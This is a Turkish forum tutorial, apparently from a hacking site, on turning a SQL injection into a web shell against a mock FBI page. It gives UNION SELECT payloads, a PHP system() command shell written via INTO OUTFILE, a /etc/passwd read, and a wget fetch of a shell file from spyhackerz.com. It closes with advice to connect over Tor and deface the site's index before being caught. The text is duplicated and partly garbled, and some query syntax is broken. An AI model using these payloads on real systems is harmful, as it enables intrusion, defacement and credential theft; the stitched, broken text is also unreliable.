Selamun Aleyküm arkadaşlar SQl injection ile Shell nasıl uploadlarız onu anlatacağım. /Döküman 7-8 yıllık dökümandır. Farklı bir tekniktir.
Sql injection yaygın ve en bilindik açık türüdür. Bu açıkla bir çok işlem yapılabilir bunlardan biride admin panele ihtiyaç duymadan shell atılabilinmesidir.
Önce sQl injction uygulayacağımız bir site seçelim
Örn site;
departmen.php?id= Adında bir sayfası olduğunu var sayarak Örnek sitemize entegre ediyoruz.
Hedef sitemize rastgele bir değer atayalım.
Tırnak işareti koyarak atağımızı yapıyoruz.
Hatamız geldi;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and page_type = 'menu' ORDER BY priority' at line 3
Kolon sayılarını bulduk varsayalım 5 tane kolon sayımız var Bizim Aradığımız 3'cü olan.
Önce versiyonuna ardından Database ve User'e bakıyoruz.3'cü kolon üzerinden yürüyeceğiz.
Yazdık ve ekrana 5.1.73-cll değeri geldi. Ardından database adını öğreniyoruz.
Ekrana federal_bureau değeri geldi.
Federal_bureau@FBI değerinin geldiğini varsayıyoruz.Ve işleme devam ediyoruz.
Elimizde gerekli bilgiler oluştu file_priv komutunu kullanıyoruz.
Federal_bureau'nun database olduğunu anlattık.Şuan yapacağımız işlem SQl hatası verdirip dizinimizi öğrenmek.
Dizinimizin bu şekilde olduğunu varsayıyorum ve devam ediyorum.
-
Dizinimize gelip kod yazıyoruz.
Yazdık ve Ekrana pwd'ler geldiyse işlemimiz başarılı olmuş demektir. Her hangi bir siteden wget komutu ile çekebiliriz
Geldik wget komutuyla shelimizi çekmeye
Evet.. wget komutu ile wget spyhackerz.com/sadri.txt adresimizden shelli çektik ve uzantısını değiştireceğiz
Şeklinde değiştiriyoruz. ve Shellimize bağlanıyoruz
Her şey bu kadar. Yakalarlar ise çukerler Tor ağı üzerinden bağlanın shell patlamadan indexi çakın
Selametle
Grayman
Sql injection yaygın ve en bilindik açık türüdür. Bu açıkla bir çok işlem yapılabilir bunlardan biride admin panele ihtiyaç duymadan shell atılabilinmesidir.
Önce sQl injction uygulayacağımız bir site seçelim
Örn site;
PHP:
www.fbı.gov/departmen.php?id= Adında bir sayfası olduğunu var sayarak Örnek sitemize entegre ediyoruz.
PHP:
www.fbı.gov/departhmens.php?id=Hedef sitemize rastgele bir değer atayalım.
PHP:
www.fbı.gov/departhmens.php?id=5Tırnak işareti koyarak atağımızı yapıyoruz.
Code:
www.fbı.gov/departhmens.php?id=5'Hatamız geldi;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and page_type = 'menu' ORDER BY priority' at line 3
Kolon sayılarını bulduk varsayalım 5 tane kolon sayımız var Bizim Aradığımız 3'cü olan.
PHP:
www.fbı.gov/departhmens.php?id=-3 union select 1,2,3,4,5--Önce versiyonuna ardından Database ve User'e bakıyoruz.3'cü kolon üzerinden yürüyeceğiz.
PHP:
www.fbı.gov/departhmens.php?id=-3 union select 1,2,version(),4,5--Yazdık ve ekrana 5.1.73-cll değeri geldi. Ardından database adını öğreniyoruz.
Ekrana federal_bureau değeri geldi.
PHP:
www.fbı.gov/departhmens.php?id=-3 union select 1,2,user(),4,5--Federal_bureau@FBI değerinin geldiğini varsayıyoruz.Ve işleme devam ediyoruz.
Elimizde gerekli bilgiler oluştu file_priv komutunu kullanıyoruz.
PHP:
www.fbı.gov/departhmens.php?id=-3 union select 1,2,file_priv,4,5 mysql.user where='Federal_Bureau'--Federal_bureau'nun database olduğunu anlattık.Şuan yapacağımız işlem SQl hatası verdirip dizinimizi öğrenmek.
Dizinimizin bu şekilde olduğunu varsayıyorum ve devam ediyorum.
PHP:
/var/home/www/FBI/httpdoc/departhmens.php-
PHP:
www.fbı.gov/departhmens.php?id=-3 union select 1,2,<?system($_REQUEST['cmd']);?>",4,5
into outfile '/var/home/www/FBI/httpdoc/departhmens.php'--Dizinimize gelip kod yazıyoruz.
PHP:
www.fbı.gov/departhmens.php?id= cat/etc/passwdYazdık ve Ekrana pwd'ler geldiyse işlemimiz başarılı olmuş demektir. Her hangi bir siteden wget komutu ile çekebiliriz
Geldik wget komutuyla shelimizi çekmeye
PHP:
www.fbı.gov/departhmens.php?id= wget spyhackerz.com/sadri.txtEvet.. wget komutu ile wget spyhackerz.com/sadri.txt adresimizden shelli çektik ve uzantısını değiştireceğiz
PHP:
www.fbı.gov/departhmens.php?id= mv sadri.txt Sadri.phpŞeklinde değiştiriyoruz. ve Shellimize bağlanıyoruz
PHP:
www.fbı.gov/Sadri.phpSelametle
Grayman
